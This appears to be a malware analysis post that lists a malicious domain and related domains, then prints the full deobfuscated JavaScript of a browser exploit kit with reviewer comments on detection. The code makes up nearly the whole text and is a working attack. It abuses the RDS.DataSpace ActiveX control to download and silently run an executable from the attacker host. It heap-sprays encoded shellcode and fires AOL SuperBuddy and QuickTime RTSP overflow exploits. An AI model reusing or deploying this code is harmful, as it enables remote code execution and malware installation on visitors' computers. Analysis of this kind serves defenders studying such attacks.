hhr2ehght.com/cgi-bin/index.cgi?mentat

Another malicious domain. Other domains that resolve to the same IP addresses are:

  • aykjfgves.com
  • bkgpfgves.com
  • busyfgves.com
  • dmiafgves.com
  • faj4ehght.com
  • gfdpves.com
  • hwh2ght.com
  • iwi5fgves.com

After decoding all of the obfuscated JS, the result is as follows:

// Returns a random string of `j77jHqSx` characters drawn from the alphabet
// below (a-i, k-z, 0-9 -- note that 'j' is absent). SYvN4dUb uses it to name
// the dropped executable, so the file name itself is not a stable indicator;
// detection should key on the write location and the launch behaviour instead.
function C6v5phSX(j77jHqSx)
{
var oc_BNXRW = "abcdefghiklmnopqrstuvwxyz0123456789";
var NqQGG_DK = '';
for (var VkTuCgOU=0; VkTuCgOU<j77jHqSx; VkTuCgOU++) {
// Random index into the alphabet; substring(i, i+1) picks exactly one character.
var EJiBajEW = Math.floor(Math.random() * oc_BNXRW.length);
NqQGG_DK += oc_BNXRW.substring(EJiBajEW, EJiBajEW+1);
}

return NqQGG_DK;
}

// Instantiates a COM object named `cl5GFOBF` through the `y0_xpFSO` object
// (the <object> element created in yTTEd2kT). Six call shapes of
// CreateObject/GetObject are tried via eval() until one does not throw;
// the first success is returned, otherwise null.
// NOTE(review): calling CreateObject on a scriptable control in order to
// obtain XMLHTTP / ADODB.Stream / WScript.Shell is the well-known technique
// for sidestepping the safe-for-scripting check; the control's CLSID is set
// in yTTEd2kT. Mitigation is patching and/or kill-bitting that control.
function nhF95ggb(y0_xpFSO, cl5GFOBF)
{
var e5JkKGLv = null;
// eval() is used only so the assignment target and the call shape can be
// composed from strings; each string below is appended to this prefix.
var FwZ7TC6m = 'e5JkKGLv=y0_xpFSO.';
var kBZ6XrGB = new Array(
'CreateObject(cl5GFOBF)',
'CreateObject(cl5GFOBF, "")',
'CreateObject(cl5GFOBF, "", "")',
'GetObject("", cl5GFOBF)',
'GetObject(cl5GFOBF, "")',
'GetObject(cl5GFOBF)'
);

var AKEfb1ki=0;

// Stops at the first variant that leaves e5JkKGLv truthy; every failure is
// swallowed, so an unpatched host is silently probed six different ways.
while(!e5JkKGLv && AKEfb1ki < kBZ6XrGB.length) {
try {
eval(FwZ7TC6m+kBZ6XrGB[AKEfb1ki]);
} catch(e) { }

AKEfb1ki++;
}

return e5JkKGLv;
}

// Synchronous GET of `AOowwO_Y` through the XMLHTTP object `SJxyPXTM`.
// Returns the raw responseBody on success, or 0 if open()/send() throws.
// NOTE(review): the caller tests the result with `!= 0`, so an empty body
// would also be treated as failure while `undefined` would not -- the
// distinction is never handled here.
function TG1sjYUg(SJxyPXTM, AOowwO_Y)
{

try {
// Third argument `false` makes the request blocking.
SJxyPXTM.open("GET", AOowwO_Y, false);
SJxyPXTM.send(null);

} catch(e) { return 0; }

return SJxyPXTM.responseBody;
}

// Writes the binary blob `gzYwvXyt` to the path `Q2RHKRuF` using the
// ADODB.Stream object `HkhWGaSf`. Returns 1 on success, 0 if any step throws.
// A browser process driving ADODB.Stream.SaveToFile is itself a strong
// detection signal regardless of the destination path.
function KieZ8MGb(HkhWGaSf, Q2RHKRuF, gzYwvXyt)
{

try {
// Type 1 = binary stream, Mode 3 = read/write (ADO StreamTypeEnum /
// ConnectModeEnum values -- confirm against the ADO reference).
HkhWGaSf.Type = 1;
HkhWGaSf.Mode = 3;
HkhWGaSf.Open();
HkhWGaSf.Write(gzYwvXyt);
// Second argument 2 = create-or-overwrite, so an existing file is clobbered.
HkhWGaSf.SaveToFile(Q2RHKRuF, 2);
HkhWGaSf.Close();
} catch(e) { return 0; }

return 1;
}

// Download-and-execute step: fetches `NdhWqtKB` via TG1sjYUg, writes it to
// c:\<6 random chars>.exe via KieZ8MGb, then launches it with either
// WScript.Shell (L_uBnbvS == 0) or Shell.Application (L_uBnbvS != 0).
// Returns 1 if the launch call did not throw, else 0.
// NOTE(review): a return of 1 only means the call returned; whether the
// process actually started is not verified.
function SYvN4dUb(NdhWqtKB, SJxyPXTM, HkhWGaSf, Zy7W1vBo, L_uBnbvS)
{
var Og_Gb_YY = 0;
var AnZ1BTbf = TG1sjYUg(SJxyPXTM, NdhWqtKB);

if (AnZ1BTbf != 0) {
// Drop location is the root of C: with a random 6-character name.
var bW8QW__e = "c:\\"+C6v5phSX(6)+".exe";

if (KieZ8MGb(HkhWGaSf, bW8QW__e, AnZ1BTbf) == 1) {
if (L_uBnbvS == 0) {
try {
// WScript.Shell.Run; second argument 0 = hidden window.
Zy7W1vBo.Run(bW8QW__e, 0);
Og_Gb_YY = 1;
} catch(e) { }
} else {
try {
// Shell.Application.ShellExecute with the "open" verb; last argument 0 = hidden.
Zy7W1vBo.ShellExecute(bW8QW__e, "", "", "open", 0);
Og_Gb_YY = 1;
} catch(e) { }
}
}
}

return Og_Gb_YY;
}

// Orchestrates the download-and-execute path. Creates an <object> with the
// hard-coded CLSID, uses it (via nhF95ggb) to obtain an XMLHTTP object, an
// ADODB.Stream and a shell object, then calls SYvN4dUb once per payload URL.
// Returns 1 if any payload was launched, else 0. The outer try/catch
// swallows every error, so a patched host simply yields 0.
// NOTE(review): the CLSID below is the one commonly associated with the
// MDAC RDS.DataSpace control -- confirm against the registry/vendor advisory.
function yTTEd2kT()
{
var xRWj5NGK = 0;
// Number of payload URLs to try; with 1 only AkJeAG2v + "0" is requested.
var AH7UTZwx = 1;
var AkJeAG2v = "http://hhr2ehght.com/cgi-bin/index.cgi?ff317aee0100f06002f7f5ea65060000000002b7ad2b550002040900000000020";
// [0] = HTTP object, [1] = ADODB.Stream, [2] = shell object.
var ctoobgsG = new Array(null, null, null);

try {
// 0 = WScript.Shell obtained, 1 = fell back to Shell.Application.
var wP34Rhxr = 0;
var pdFNqmUw = document.createElement("object");
pdFNqmUw.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (pdFNqmUw) {
// Three XMLHTTP ProgIDs are tried in turn.
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "msxml2.XMLHTTP");
if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "Microsoft.XMLHTTP");

if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "MSXML2.ServerXMLHTTP");

ctoobgsG[1] = nhF95ggb(pdFNqmUw, "ADODB.Stream");

ctoobgsG[2] = nhF95ggb(pdFNqmUw, "WScript.Shell");

if (!ctoobgsG[2]) {
ctoobgsG[2] = nhF95ggb(pdFNqmUw, "Shell.Application");
if (ctoobgsG[2]) wP34Rhxr = 1;
}
}

// Only proceeds when all three objects were obtained.
if (ctoobgsG[0] && ctoobgsG[1] && ctoobgsG[2]) {
for(var maApDNpL=0;maApDNpL<AH7UTZwx;maApDNpL++) {
var jwOMpHKx = SYvN4dUb(AkJeAG2v+maApDNpL.toString(), ctoobgsG[0], ctoobgsG[1], ctoobgsG[2], wP34Rhxr);

// First success is sticky; later iterations cannot reset it.
if (!xRWj5NGK)
xRWj5NGK = jwOMpHKx;
}
}

} catch(e) {}

return xRWj5NGK;
}

// Sets two site-wide cookies, "id" and "addt", each only when its argument is
// truthy, with an expiry 120000 days in the future (Date.setDate accepts the
// overflow, so this is roughly three centuries). Errors are swallowed.
// Callers in this file pass a single argument (9 from the SuperBuddy path,
// 6 from the QuickTime path), so "addt" is never set here; presumably the
// "id" value tells the server which exploit was attempted -- unverified.
// The cookie name/value pair is a usable indicator for proxy or host logs.
function fXNZKHCv(YyJyCoZl, CGoWNZCa)
{
try {

var t7EpCn8v = new Date();
t7EpCn8v.setDate(t7EpCn8v.getDate() + 120000);

if (YyJyCoZl) {
document.cookie =
"id=" + YyJyCoZl +
"; path=/" +
"; expires=" + t7EpCn8v.toGMTString();
}

if (CGoWNZCa) {
document.cookie =
"addt=" + CGoWNZCa +
"; path=/" +
"; expires=" + t7EpCn8v.toGMTString();
}

} catch(e) {
}
}

// Holds the heap-spray blocks built by z5UkPTPx; kept global so they stay
// referenced for the lifetime of the page.
var rjnbcVWi = new Array();
// Set to 1 once z5UkPTPx has run, so the spray is only built once.
var TLJFLY3j = 0;

// Self-rescheduling timer (every 100 ms) whose only statement assigns the
// spray array to itself. Functionally a no-op; presumably intended to keep
// the array reachable/touched while the exploits run -- unverified.
function cRptI8eT()
{
rjnbcVWi = rjnbcVWi;
setTimeout(cRptI8eT, 100);
}

// Grows `fGQW2WpI` by repeated self-concatenation until its UTF-16 byte size
// (length * 2) reaches `axv_tc2J`, then truncates it to axv_tc2J/2 characters
// so the result occupies about `axv_tc2J` bytes. A fractional axv_tc2J/2 is
// truncated by substring(). Used by z5UkPTPx to build the filler in each
// spray block.
function BhC9PuAe(fGQW2WpI, axv_tc2J)
{
while (fGQW2WpI.length*2<axv_tc2J)
fGQW2WpI += fGQW2WpI;

fGQW2WpI = fGQW2WpI.substring(0,axv_tc2J/2);
return fGQW2WpI;
}

// Heap spray. Runs once (guarded by TLJFLY3j): fills rjnbcVWi with strings of
// 0x400000 bytes each, consisting of 0x0c0c0c0c filler followed by the
// unescape()d payload, so that address 0x0c0c0c0c (used as the argument in
// aYDOf7kN and as the trailing bytes in yWU2EXku) lands inside sprayed data.
// Block count is (0x0c0c0c0c - 0x400000) / 0x400000, about 47.2, so the loop
// runs 48 times (~192 MB). The payload bytes are not decoded on this page.
// From a defender's view: a page allocating ~200 MB of identical large
// strings right before instantiating legacy ActiveX controls is the
// behavioural signature worth alerting on. Always returns 0.
function z5UkPTPx()
{
if (!TLJFLY3j) {
// Target address the spray is sized to cover.
var Imbda2fQ = 0x0c0c0c0c;
var vfsx2ajx = unescape("%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%ud2b0%u4530%u4500%u7549%uebf9%u4200%u4242%u4242%u4242%u3b42%ud22e%ud2d2%ub68d%ue273%ud2d2%uaad2%u59de%ude92%ua259%u7fce%uba59%u39da%u59db%ue692%u925f%u59ae%ueeba%u2559%ud6b8%u3a8b%ud25d%ud2d2%u2b30%ubdba%ud2bc%ubad2%ua0a7%ubfbe%u2d86%u59c4%u3a3a%ud2ab%ud2d2%u0559%u5295%ud2ed%u28a7%u8595%u5295%ud2ed%u28a7%u3d59%ue18d%u531b%ud63e%ud2d3%u59d2%u830e%u8180%ud6ba%ud2d3%u2dd2%ude84%u8b88%u8083%ud059%u9181%ue952%ua7d2%u5328%u2ea9%ub7fc%ub7aa%ud1a7%u3951%u5bda%u15d1%ud691%ub7fc%ub7aa%u9114%ud2da%u5889%ud613%u5ae2%ud297%u12e1%u8282%u8581%u2d82%uc284%u2a51%ua7d2%ub8d4%u81d3%u842d%u88d6%u518b%ud610%u5293%ud2e8%u66a7%u842d%u83da%u5984%ueea7%ua659%uaafc%u27d1%u5984%uf2a4%u27d1%u1be1%u939b%ud17f%ue117%udd09%uc26c%u04e8%udaa6%u1913%ud1df%u9208%u2339%ucde9%u35a7%u598c%uf68c%u0fd1%u59b4%u99de%u8c59%ud1ce%u590f%u59d6%u17d1%u8c79%u118b%u2d3a%u2d2c%u5c2d%udc9c%u4a3e%u582c%uacdc%u300a%ue1a1%u5818%ue489%ufdc8%ubfa2%u9181%ud2bf%ua6ba%ua2a6%ufde8%ubafd%ua0ba%ub7e0%ub5ba%ua6ba%ub1fc%ubfbd%ub1fd%ubbb5%ub0ff%ubcbb%ubbfd%ub6bc%uaab7%ub1fc%ubbb5%ub4ed%ue1b4%ue5e3%ub7b3%ue2b7%ue2e3%ub4e2%ue4e2%ue2e2%ub4e0%ub4e5%ub7e7%ue4b3%ue2e7%ue2e4%ue2e2%ue2e2%ue2e2%ue2e2%ub0e0%ub3e5%ue0b6%ue7b0%ue2e7%ue2e2%ue2e0%ue2e6%ue2eb%ue2e2%ue2e2%ue2e2%ue2e2%ue2ea%u00d2");
// Size of one spray block in bytes.
var A1GHCJ0I = 0x400000;
// Payload size in bytes (JS strings are UTF-16, two bytes per char).
var Yv0fjrfS = vfsx2ajx.length * 2;
// Filler size: block size minus payload minus 0x38 -- presumably headroom
// for the string object's own overhead, unverified.
var axv_tc2J = A1GHCJ0I - (Yv0fjrfS+0x38);
var fGQW2WpI = unescape("%u0c0c%u0c0c");

fGQW2WpI = BhC9PuAe(fGQW2WpI,axv_tc2J);
var gqW1gRWx = (Imbda2fQ - 0x400000)/A1GHCJ0I;

for (var rDjzS8iO=0;rDjzS8iO<gqW1gRWx;rDjzS8iO++) {
rjnbcVWi[rDjzS8iO] = fGQW2WpI + vfsx2ajx;
}

TLJFLY3j = 1;
cRptI8eT();
}

return 0;
}

// Second exploit path. Instantiates the 'Sb.SuperBuddy' ActiveX control
// (believed to be the AOL SuperBuddy control -- confirm), builds the heap
// spray, sets cookie id=9, then calls LinkSBIcons with the sprayed address
// 0x0c0c0c0c as its argument. Always returns 0, so the caller's `||` chain
// continues to yWU2EXku whether or not this path fired.
// Mitigation: kill-bit / remove the control; the ProgID is a usable
// detection string in page content.
function aYDOf7kN() {

try {
var lKcQNr_i = new ActiveXObject('Sb.SuperBuddy');

if (lKcQNr_i) {
z5UkPTPx();
fXNZKHCv(9);
lKcQNr_i.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

// Third exploit path. Checks for 'QuickTime.QuickTime.4', builds the heap
// spray, then injects an <object> whose qtnext1 parameter is an rtsp:// URL
// padded with 803 'A' characters followed by twelve 0x0c bytes (the sprayed
// address repeated). The overlong RTSP URL is consistent with a known
// QuickTime URL-handling overflow of that era -- confirm against the vendor
// advisory. Sets cookie id=6 before appending the element. Always returns 0.
// NOTE(review): `i44TB6HK = 0` below is an implicit global (no `var`); the
// commented-out code at the bottom of the page checks document.i44TB6HK,
// a different property, so that check could never observe it.
function yWU2EXku()
{
try {
var EF8iSrGY = new ActiveXObject("QuickTime.QuickTime.4");

if (EF8iSrGY) {
z5UkPTPx();
var HRtvZlIp = "";
// 200 * "AAAA" = 800 chars ...
for(var cwfnrm_q=0;cwfnrm_q<200;cwfnrm_q++) {
HRtvZlIp += "AAAA";
}

// ... plus 3 = 803 filler characters.
HRtvZlIp += "AAA";

// Then 3 * 4 = 12 bytes of 0x0c, i.e. 0x0c0c0c0c three times.
for(var cwfnrm_q=0;cwfnrm_q<3;cwfnrm_q++) {
HRtvZlIp += "\x0c\x0c\x0c\x0c";
}

// The classid here is the QuickTime plugin control; the src param points
// back at the same C2 host as the download path.
var Xx88lxkG =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://hhr2ehght.com/cgi-bin/index.cgi?ff317aee0100f06001f7f5ea65060000000002b7ad2b55000204090000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + HRtvZlIp +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

i44TB6HK = 0;
var Nj2qgprh = document.createElement("div");
Nj2qgprh.innerHTML = Xx88lxkG;
fXNZKHCv(6);
// Appending to the body is what activates the plugin with the crafted URL.
document.body.appendChild(Nj2qgprh);

}
} catch(e) {
}

return 0;
}
// Entry point: the three exploit paths run in order, short-circuiting on the
// first truthy result. Only yTTEd2kT can return 1 (the other two always
// return 0), so all three are attempted unless the download path succeeds.
// Both branches assign the same value, so the condition is effectively dead;
// presumably a leftover from the redirect logic commented out below.
if (yTTEd2kT() || aYDOf7kN() || yWU2EXku()
) {
document.QvPNJ2gK = 'about:blank';
} else {
document.QvPNJ2gK = 'about:blank';
}

// Commented-out redirect: it waits for three document properties that
// nothing in this script sets on `document`, so it would never redirect.
/*setTimeout(function() {
if (document.i44TB6HK && document.MNYpDkrw && document.DApIuZCX) {
setTimeout("window.location = '" + document.QvPNJ2gK + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/
